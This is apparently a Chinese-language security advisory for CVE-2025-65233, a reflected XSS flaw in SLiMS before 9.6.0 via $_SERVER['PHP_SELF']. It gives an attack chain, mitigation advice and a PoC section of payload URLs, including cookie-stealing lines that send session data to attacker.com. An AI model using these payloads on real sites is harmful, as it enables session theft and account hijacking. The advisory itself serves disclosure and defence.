CVE-2025-65233: SLiMS (slims9_bulian) 反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-65233

漏洞类型

反射型XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

SLiMS (slims9_bulian)

漏洞概述

CVE-2025-65233是SLiMS（slims9_bulian）系统中存在的一个反射型跨站脚本（XSS）漏洞。该漏洞源于index.php和sysconfig.inc.php文件中对$_SERVER['PHP_SELF']变量处理不当。攻击者可以通过构造包含恶意JavaScript代码的URL路径，当受害者访问该恶意链接时，浏览器会执行攻击者注入的脚本代码。由于该漏洞属于反射型XSS，需要用户点击特制的链接才能触发攻击。攻击成功后，攻击者可窃取用户会话Cookie、劫持用户账户、进行钓鱼攻击或在用户浏览器中执行任意操作。此漏洞影响SLiMS 9.6.0之前的所有版本，CVSS评分为6.1，属于中等严重程度。

技术细节

该漏洞的核心问题在于SLiMS应用程序未对$_SERVER['PHP_SELF']进行适当的输入验证和输出编码。$_SERVER['PHP_SELF']返回当前执行脚本的路径信息，攻击者可以通过在URL路径中注入恶意脚本代码来实现XSS攻击。例如，当用户访问形如http://target/slims9/index.php/<script>alert(1)</script>的URL时，PHP_SELF变量会包含完整的路径信息，如果应用程序直接将此变量输出到HTML页面而未进行转义，就会导致恶意脚本执行。攻击者通常会构造包含XSS payload的钓鱼链接，通过社会工程学手段诱导用户点击。由于该漏洞不需要认证即可利用（PR:N），且攻击复杂度较低（AC:L），对任何访问该应用的用户都构成威胁。修复方案是在输出$_SERVER['PHP_SELF']时使用htmlspecialchars()或类似函数进行编码。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的SLiMS版本，确认版本低于9.6.0，并确定存在漏洞的入口点index.php和sysconfig.inc.php

STEP 2

步骤2: Payload构造

攻击者根据反射型XSS漏洞特点，构造包含恶意JavaScript代码的URL路径，如在URL后添加<script>alert(document.cookie)</script>

STEP 3

步骤3: 社会工程攻击

攻击者通过钓鱼邮件、社交媒体或其他渠道向目标用户发送包含恶意链接的消息，诱导用户点击该链接

STEP 4

步骤4: XSS执行

当用户访问恶意链接时，$_SERVER['PHP_SELF']包含恶意payload并被直接输出到HTML页面，浏览器执行注入的JavaScript代码

STEP 5

步骤5: 敏感信息窃取

攻击者通过JavaScript代码窃取用户Cookie、会话令牌或其他敏感信息，并将这些数据发送到攻击者控制的服务器

STEP 6

步骤6: 账户劫持

攻击者使用窃取的会话信息伪装成合法用户进行操作，可能包括数据窃取、权限提升或进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Reflected XSS PoC for CVE-2025-65233 -->
<!-- Target: SLiMS (slims9_bulian) < 9.6.0 -->
<!-- Attack Vector: Malicious URL path via $_SERVER['PHP_SELF'] -->

<!-- Basic XSS PoC -->
http://target/slims9/index.php/<script>alert(document.cookie)</script>

<!-- Bypassing filters with various encoding techniques -->
http://target/slims9/index.php/"><script>alert('XSS')</script>
http://target/slims9/index.php/'><img src=x onerror=alert(1)>
http://target/slims9/index.php/"><svg onload=alert(document.domain)>

<!-- Cookie stealing PoC -->
http://target/slims9/index.php/<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>

<!-- Session hijacking PoC -->
http://target/slims9/index.php/<script>document.location='https://attacker.com/phishing?session='+btoa(document.cookie)</script>

<!-- Using the vulnerable endpoint sysconfig.inc.php -->
http://target/slims9/sysconfig.inc.php/<script>eval(atob('YWxlcnQoMSk='))</script>

影响范围

SLiMS (slims9_bulian) < 9.6.0

防御指南

临时缓解措施

在等待官方修复期间，可采取以下临时缓解措施：1) 在Web服务器层面配置URL重写规则，过滤恶意字符；2) 修改PHP代码，在所有使用$_SERVER['PHP_SELF']的地方添加htmlspecialchars()转义；3) 部署WAF（Web应用防火墙）规则检测和阻止XSS攻击；4) 加强对用户的安全意识培训，提醒不要点击可疑链接；5) 监控应用日志，及时发现可疑的XSS攻击尝试。